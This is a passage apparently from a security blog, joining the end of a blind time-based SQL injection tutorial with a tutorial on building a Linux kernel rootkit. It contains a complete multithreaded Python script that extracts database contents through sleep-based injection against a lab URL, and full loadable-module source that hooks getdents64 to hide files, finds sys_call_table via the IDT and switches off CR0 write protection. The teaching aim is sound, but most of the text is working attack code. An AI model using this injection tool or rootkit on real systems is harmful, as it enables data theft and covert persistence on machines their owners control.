if(ascii(substr(current_user(), 1, 1))=100,sleep(5),0)

Both will work fine.

This time because we are using a time-based approach we want to try to speed things up by writing a script which has the ability to make multiple requests at once.

We can do this using multithreading and in python using the threading module.

I will use Queue for submitting the jobs to the threads and a list for getting the responses.

Here is the script:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/env python

import threading, urllib2, timeit, Queue, sys

if len(sys.argv) > 1:
    max = int(sys.argv[1])
else:
    max = 256

if len(sys.argv) > 2:
    t = int(sys.argv[2])
else:
    t = 3

if max % 2 != 0:
    print "Error: %d not divisible by 2" % max

class getLength(threading.Thread):
    def __init__(self, inq, out):
        threading.Thread.__init__(self)
        self.inq = inq
        self.out = out
        self.query = "current_user%28%29%"

    def run(self):
        while True:
            try:
                bit = self.inq.get(False)
            except Queue.Empty:
                return

            data = "sort_results=if%28length%28" + self.query + "%29+%26+"+str(bit)+"="+str(bit)+",sleep%283%29,0%29"
            url = "http://192.168.2.11/sqli/sql8/index.php"
            t = timeit.Timer("urllib2.urlopen(u, data=d)", "import urllib2; u=\""+url+"\"; d=\""+data+"\"")
            if t.timeit(number=1)>3.0:
                self.out.append(bit)
            self.inq.task_done()

class getCharacter(threading.Thread):
    def __init__(self, inq, out):
        threading.Thread.__init__(self)
        self.inq = inq
        self.out = out
        self.query = "current_user%28%29%"

    def run(self):
        url = "http://192.168.2.11/sqli/sql8/index.php"
        while True:
            max = 256
            mid = 127
            min = 1
            try:
                cpos = self.inq.get(False)
            except Queue.Empty:
                return

            while min != max - 1:
                data = "sort_results=if%28ascii%28substr%28" + self.query + ","+str(cpos+1)+",1%29%29+>+"+str(mid)+",sleep%283%29,0%29"
                t = timeit.Timer("urllib2.urlopen(u, data=d)", "import urllib2; u=\""+url+"\"; d=\""+data+"\"")
                if t.timeit(number=1)>3.0:
                    min = mid + 1
                    mid = min + ((max - min) / 2)
                else:
                    max = mid
                    mid = min + ((max - min) / 2)
            data = "sort_results=if%28ascii%28substr%28" + self.query + ","+str(cpos+1)+",1%29%29+>+"+str(min)+",sleep%283%29,0%29"
            t = timeit.Timer("urllib2.urlopen(u, data=d)", "import urllib2; u=\""+url+"\"; d=\""+data+"\"")
            if t.timeit(number=1)>3.0:
                self.out.append((cpos, chr(max)))
            else:
                self.out.append((cpos, chr(min)))
            self.inq.task_done()

inq = Queue.Queue()
out = []

nin = max
while nin > 1:
    nin /= 2
    inq.put(nin)

threads = []

for i in range(t):
    thread = getLength(inq, out)
    thread.setDaemon(True)
    thread.start()
    threads.append(thread)

inq.join()

for thread in threads:
    thread.join()

length = 0
for i in out:
    length += i

print "The length is " + str(length)

for i in range(length):
    inq.put(i)

out = []

for i in range(t):
    thread = getCharacter(inq, out)
    thread.setDaemon(True)
    thread.start()

inq.join()

s = ''.join([b for a, b in sorted(out, key=lambda t: t[0])])
print s

So firstly, lines 5-8, I set the maximum length of the string that we are looking for, by default its 256 but can be changed by the first argument and should always be a multiple of 2.

Then, lines 10-13, I set the number of threads, by default its 3 because this is the limit that the Secritytube SQLi challenges allow but can be changed by the second argument.

I then create 2 classes that inherit from threading.Thread which allows then to be multithreaded.

The first of these classes, as the name suggests, gets the length of the string resulting from the query that we want to run.

The second, as the name also suggests, gets the characters.

First I launch a bunch of threads to find out the length of the string, and wait until they are finished.

Then I launch a bunch of threads to find out the value of each character.

I'm using 2 different methods of concurrency here, mainly to demonstrate both methods.

Bit-For-Bit Method

The first, to find the length, is a bit-for-bit check, basically I'm checking whether each bit in the result is a 1 or a 0.

To understand this you need to picture the numbers in their binary representation, so let's take the value 73.

So our string is 73 characters long, which means if I run the query length([query]), it returns 73.

The binary representation of 73 is 01001001 using 8 bits.

Each bits value is 2^n, where n is the position of the bit minus 1 starting at the rightmost position.

So the first bit is a 1, its value is 2^0 or 1, the second bit is a 0 its value is 2^1 or 2, but because it is 0 we can ignore it.

If we continue this the bits with a 1 have the values, 1, 8 and 64, if we add these together we get 1+8+64=73.

So you can see how we can get the length of the string of less than 256 characters in no more than 8 requests.

The next question is how do we test if a certain bit is 1 or 0, the answer is bitwise operators.

Here I am using the AND or & operator, which returns a result where only bits in both operands where a 1.

Let's look at our example again, if we do 73 & 1 we get 1, if we do 73 & 2 we get 0 because the bit that represents 2 is not a 1 in 73.

Using this method our conditional query becomes length([query]) & [bit we are testing for] = [bit we are testing for].

This way we can, in theory, test for each bit position in parallel.

Obviously instead of returning 1 if the condition is true we will sleep for 3 seconds and check the response time.

Binary Search Method

The second check, to find out the actual characters, I am using a binary search.

Basically a binary search works by finding the middle of the search range and asking if its greater than that, efeectively narrowing the search by half every request, until the correct value has been found.

Let's take the same example as the example we looked at for the bit-for-bit method, so the value is 73.

The maximum value for 1 byte of data is always 255, so there are 256 possible values.

First we'll ask if 73 > 127, which the answer is no, so the max becomes 127, and the middle becomes min + ((max - min) / 2) or 1 + ((127 - 1) / 2) or 1 + (126 / 2) or 1 + 63 or 64.

Then we go again and ask if 73 > 64, the answer is yes, so the min becomes 65 and the mid becomes min + ((max - min) / 2) or 65 + ((127 - 65) / 2) or 65 + (62 / 2) or 65 + 31 or 96.

We can represent this type of comparison in our injection condition like this:

ascii(substr([query],[position we are testing],1))>[current mid value]

This continues until we find the correct value which takes 8 requests with a 32 bit value (up to 255).

Using this and substituting current_user%28%29 with any query that we want the output of we can enumerate anything in the database that the current user has permissions to view.

Because we know the number of characters we can do multiple characters in parallel.

Conclusion

You should now have a very good idea of how to look for and exploit SQL injection's in a blackbox way.

Every situation will be different which is why, even though a lot of the automated SQL injection tools out there (like sqlmap) are good in a lot of situations, you still need to understand how to do it all manually for when the tools fail.

Being able to script SQL injection tools is a necessity when dealing with blind SQL injections, trying to enumerate even small amounts of data when you only have the ability to extract 1 bit at a time would be a horrible task!

Further Reading

The best book I've read on SQL injection is Justin Clarke's SQL Injection Attacks and Defence and he goes into a lot more detail and situations than I can on this single post.

Rootkit for Hiding Files

In this post I am going to be putting together all of the knowledge we have gained in the previous posts and improving on the last rootkit in a few different ways.

I will fix the issue that I explained the last LKM had (being able to query the file directly using ls [filename]), while making it more portable and giving it the ability to hide multiple files but I will start with splitting the LKM into multiple files to make it easier to manage.

The code for this rootkit will be in a link at the bottom of the post in .tgz format.

Splitting The LKM

Having the LKM split across multiple files makes it easier to manage, especially as the module gets more and more complex.

First we will start with the main file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{

    sys_call_table = (void*)0xc1454100;
    original_getdents64 = sys_call_table[__NR_getdents64];

    set_page_rw(sys_call_table);
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    set_page_ro(sys_call_table);
    return 0;
}

static void __exit hidefiles_exit(void)
{
    set_page_rw(sys_call_table);
    sys_call_table[__NR_getdents64] = original_getdents64;
    set_page_ro(sys_call_table);
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

I've made a couple of changes here, like I've set the sys_call_table page to read only after I've made the change and changing the name of the init and exit functions, but other than that it is copy and pasted from the last LKM.

Now for the file containing the system calls:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#define FILE_NAME "thisisatestfile.txt"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    int rtn;
    struct linux_dirent64 *cur = dirp;
    int i = 0;
    rtn = original_getdents64(fd, dirp, count);
    while (i < rtn) {
        if (strncmp(cur->d_name, FILE_NAME, strlen(FILE_NAME)) == 0) {
            int reclen = cur->d_reclen;
            char *next_rec = (char *)cur + reclen;
            int len = (int)dirp + rtn - (int)next_rec;
            memmove(cur, next_rec, len);
            rtn -= reclen;
            continue;
        }
        i += cur->d_reclen;
        cur = (struct linux_dirent64*) ((char*)dirp + i);
    }
    return rtn;
}

We also need to create a header file for the syscalls so that the functions can be referenced from the main.c file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#ifndef SYSCALLS
#define SYSCALLS

#include <linux/semaphore.h>
#include <linux/types.h>
#include <linux/dirent.h>

// Functions
asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
extern asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

#endif

This needs to be included in both the main.c and syscalls.c files, just add the line #include "syscalls.h" somewhere near the top.

This is why we have to put #ifndef, this ensures that the file will not be included twice.

Now we need to create the C file for the last set of functions:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#include <asm/cacheflush.h>

int set_page_rw(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
    return 0;
}

int set_page_ro(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    pte->pte = pte->pte &~_PAGE_RW;
    return 0;
}

We also need to create a header file for these functions so we can use them inside main.c:

1
2
3
4
5
6
7
#ifndef FUNCTS
#define FUNCTS

int set_page_rw(unsigned long addr);
int set_page_ro(unsigned long addr);

#endif

This file also needs to be included in main.c with the line #include "functs.h".

We now need a makefile:

1
2
3
obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o

I couldn't get it to work by just running make so I had to run the full command myself:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:21:9: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:4:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c:23:2: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:5:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c: In function ‘hidefiles_exit’:
/root/lkms/hidefiles/main.c:29:2: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:4:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c:31:9: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:5:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
  CC [M]  /root/lkms/hidefiles/functs.o
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'

We can ignore these warnings for the moment, we are going to replace these functions anyway.

Now to test our rootkit:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
root@dev:~/lkms/hidefiles# touch thisisatestfile.txt
root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt

So it seems to work nicely, now we can concentrate on extending it.

Automagically Finding sys_call_table

A brilliant writeup of how to find the sys_call_table, amungst other things, on x86 Linux is here. I highly recommend reading that post.

We are going to use the technique under section 3.1, titled How to get sys_call_table[] without LKM.

You can use a slight vairation of this technique on each architecture, just search Google a bit and you should be able to find something if you can't work it out from this description.

Firstly we need to read the Interrupt Descriptor Table Register (IDTR) and get the address of the base of the Interrupt Descriptor Table (IDT).

Offset 0x80 from the IDT base address is the address of a function called system_call, this function uses call to make system calls using the sys_call_table.

Once we have the base address of the system_call function we need to search through its code for 3 bytes ("\xff\x14\x85").

The memmem function just searches through code for a particular set of bytes and returns a pointer to it if found or NULL if not. Its implemented in libc but we will have to implement it ourselves in our LKM.

We also need to remember to include the 2 structs idtr and idt.

Here's the code for all of this which we can put into functs.c:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
struct {
    unsigned short limit;
    unsigned long base;
} __attribute__ ((packed))idtr;

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none, flags;
    unsigned short off2;
} __attribute__ ((packed))idt;

void *memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen)
{
    char *p;

    for(p = (char *)haystack; p <= ((char *)haystack - needlelen + haystacklen); p++)
        if(memcmp(p, needle, needlelen) == 0)
            return (void *)p;
    return NULL;
}

unsigned long *find_sys_call_table(void)
{
    char **p;
    unsigned long sct_off = 0;
    unsigned char code[255];

    asm("sidt %0":"=m" (idtr));
    memcpy(&idt, (void *)(idtr.base + 8 * 0x80), sizeof(idt));
    sct_off = (idt.off2 << 16) | idt.off1;
    memcpy(code, (void *)sct_off, sizeof(code));

    p = (char **)memmem(code, sizeof(code), "\xff\x14\x85", 3);

    if(p)
        return *(unsigned long **)((char *)p + 3);
    else
        return NULL;
}

We also need to add the following prototype to functs.h:

1
unsigned long *find_sys_call_table(void);

Lastly we need to edit main.c so that we get the address of sys_call_table using this method, we just replace the line that starts sys_call_table = with:

1
2
3
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;

Improving The Method Of Writing To Read-Only Memory

So far we have manually changed the page table entry to change the permissions on the specific page that we want to write to read-write.

As we are running with the same privileges as the kernel we can do this in an easier way and ensure that any changes to this mechanism in the future doesn't stop our ability to write to this memory.

Running in kernel mode we have the ability to change the CR0 register.

The 16th bit of the CR0 register is responsible for enforcing whether or not the CPU can write to memory marked read-only.

With this is mind we can rewrite the functions that we were using in functs.c for this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
void disable_write_protection(void)
{
    unsigned long value;
    asm volatile("mov %%cr0,%0" : "=r" (value));
    if (value & 0x00010000) {
        value &= ~0x00010000;
        asm volatile("mov %0,%%cr0": : "r" (value));
    }
}

void enable_write_protection(void)
{
    unsigned long value;
    asm volatile("mov %%cr0,%0" : "=r" (value));
    if (!(value & 0x00010000)) {
        value |= 0x00010000;
        asm volatile("mov %0,%%cr0": : "r" (value));
    }
}

I've changed the names to make it apparent that these functions are actually doing something different.

You also need to change the 2 prototypes in functs.h to:

1
2
void disable_write_protection(void);
void enable_write_protection(void);

Lastly we need to edit main.c, remember these new functions do not require an argument.

Multi-File Support

To support hiding multiple files we need to implement a character device to communicate with the rootkit (we could use a network connection but we'll take that up later) and we need a method of storing the data.

For storing the data we will use a linked list, the kernel has the ability to manipulate linked lists but I will create my own functions for doing this as a programming exercise (later we will investigate how to use the features already in the kernel).

Linked List

First let's create the linked list and the functions for adding and removing items:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
struct file_list {
    char *file_name;
    struct file_list *next_file;
};

typedef struct file_list list;

list *hidden_files = NULL;

void addfile(const char *f)
{
    list *tmp;
    char *s;
    if (hidden_files == NULL) {
        tmp = (list*)vmalloc(sizeof(list));
        s = vmalloc(sizeof(*f));
        strcpy(s, f);
        tmp->file_name = s;
        tmp->next_file = hidden_files;
        hidden_files = tmp;
    } else {
        tmp = hidden_files;
        while (tmp != NULL && (strlen(tmp->file_name) != strlen(f) || strncmp(tmp->file_name, f, strlen(tmp->file_name)) != 0)) {
            tmp = tmp->next_file;
        }
        if (tmp == NULL) {
            list *tmp2;
            tmp2 = (list*)vmalloc(sizeof(list));
            s = vmalloc(sizeof(*f));
            strcpy(s, f);
            tmp2->file_name = s;
            tmp2->next_file = hidden_files;
            hidden_files = tmp2;
        }
    }
}

void remfile(const char *f)
{
    list *tmp, *tmp2;
    int c = 0;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strlen(tmp->file_name) == strlen(f)){
            if (strncmp(tmp->file_name, f, strlen(tmp->file_name)) == 0) {
                if (c == 0) {
                    hidden_files = tmp->next_file;
                    vfree(tmp->file_name);
                    vfree(tmp);
                    return;
                }
                tmp2->next_file = tmp->next_file;
                vfree(tmp->file_name);
                vfree(tmp);
            }
        }
        tmp2 = tmp;
        tmp = tmp->next_file;
        c += 1;
    }
}

The structure of each element is defined at the top (lines 1 - 4), its pretty simple, just a basic singly linked list.

2 functions are then defined addfile and remfile, which are pretty self-explainitory, 1 thing to note here is that the vmalloc function is being used to allocate the memory, which allocates a contiguous address range of virtual memory, this obviously means that vfree has to be used to free the memory after.

Both of these functions take 1 argument, a string, and add or remove that string to the list depending on which function is called.

Its best to create a function that empties the list:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
void emptylist()
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        hidden_files = tmp->next_file;
        vfree(tmp->file_name);
        vfree(tmp);
        tmp = hidden_files;
    }
}

Lastly we need a function to check if a name exists in the list:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
int lookupfilename(const char *f)
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strlen(tmp->file_name) == strlen(f)){
            if (strncmp(f, tmp->file_name, strlen(tmp->file_name)) == 0){
                return 1;
            }
        }
        tmp = tmp->next_file;
    }
    return 0;
}

This functions takes a string as an argument and iterates through the list checking, first the length, and then the whole string, against every entry in the list, if it finds a match it returns a 1, otherwise it returns a 0.

Initially I developed this linked list in a normal C application and just improved upon it and kernelfied it. :-) Here is my original application:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct file_list {
    char *file_name;
    struct file_list *next_file;
};
typedef struct file_list list;
list *hidden_files = NULL;

void addfile(const char *f);
void remfile(char *f);
void printfiles();

void main()
{
    addfile("one");
    remfile("one");
    printfiles();
    addfile("two");
    printfiles();
    addfile("three");
    addfile("four");
    printfiles();
    remfile("two");

    printfiles();
}

void addfile(const char *f)
{
    list *tmp;
    if (hidden_files == NULL) {
        tmp = (list*)malloc(sizeof(list));
        char *s = malloc(sizeof(*f));
        strcpy(s, f);
        tmp->file_name = s;
        tmp->next_file = hidden_files;
        hidden_files = tmp;
    } else {
        tmp = hidden_files;
        while (tmp != NULL && strcmp(tmp->file_name, f) != 0) {
            tmp = tmp->next_file;
        }
        if (tmp == NULL) {
            list *tmp2;
            tmp2 = (list*)malloc(sizeof(list));
            char *s = malloc(sizeof(*f));
            strcpy(s, f);
            tmp2->file_name = s;
            tmp2->next_file = hidden_files;
            hidden_files = tmp2;
        }
    }
}

void remfile(char *f)
{
    list *tmp, *tmp2;
    int c = 0;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strcmp(tmp->file_name, f) == 0) {
            if (c == 0) {
                hidden_files = tmp->next_file;
                free(tmp->file_name);
                free(tmp);
                return;
            }
            tmp2->next_file = tmp->next_file;
            free(tmp->file_name);
            free(tmp);
        }
        tmp2 = tmp;
        tmp = tmp->next_file;
        c += 1;
    }
}

void printfiles()
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        printf("%s : %x\n", tmp->file_name, tmp->next_file);
        tmp = tmp->next_file;
    }
}

Clearly this application is using more primitive versions of the addfile and remfile functions above. Its also using the usermode's malloc and free instead of vmalloc and vfree for obvious reasons.

I only included this to show how I've developed these functions in usermode and then converted it to kernelmode.

Anyway, the kernel functions above (addfile, remfile, emptylist and lookupfilename) as well as the struct declarations and definition should go into the file list.c.

#include "list.h" should be put at the top and the file list.h should be created with the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#ifndef LIST
#define LIST

#include <linux/vmalloc.h>

// Functions
void addfile(const char *f);
void remfile(const char *f);
void emptylist(void);
int lookupfilename(const char *f);

#endif

We need to include the linux/vmalloc.h header file for the vmalloc and vfree functions.

syscalls.c needs to be changed, list.h needs to be included, the FILE_NAME definition should be removed and the strncmp line should be changed to use lookupfilename instead, so it should end up like the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include "syscalls.h"
#include "list.h"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    int rtn;
    struct linux_dirent64 *cur = dirp;
    int i = 0;
    rtn = original_getdents64(fd, dirp, count);
    while (i < rtn) {
        if (lookupfilename(cur->d_name) == 1) {
            int reclen = cur->d_reclen;
            char *next_rec = (char *)cur + reclen;
            int len = (int)dirp + rtn - (int)next_rec;
            memmove(cur, next_rec, len);
            rtn -= reclen;
            continue;
        }
        i += cur->d_reclen;
        cur = (struct linux_dirent64*) ((char*)dirp + i);
    }
    return rtn;
}

Because we want to hide some files when the LKM is loaded and also empty the list when the LKM is unloaded we need to include the list.h header file and make the relevent calls to addfile and emptylist in main.c, so our main.c should end up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    enable_write_protection();
    addfile("thisisatestfile.txt");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    enable_write_protection();
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

Lastly we need to edit the Makefile to include list.o, so it should end up like this:

1
2
3
obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o list.o

Now to compile and test:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:18:17: warning: assignment from incompatible pointer type [enabled by default]
  CC [M]  /root/lkms/hidefiles/syscalls.o
  CC [M]  /root/lkms/hidefiles/list.o
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
root@dev:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h  thisisatestfile.txt
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
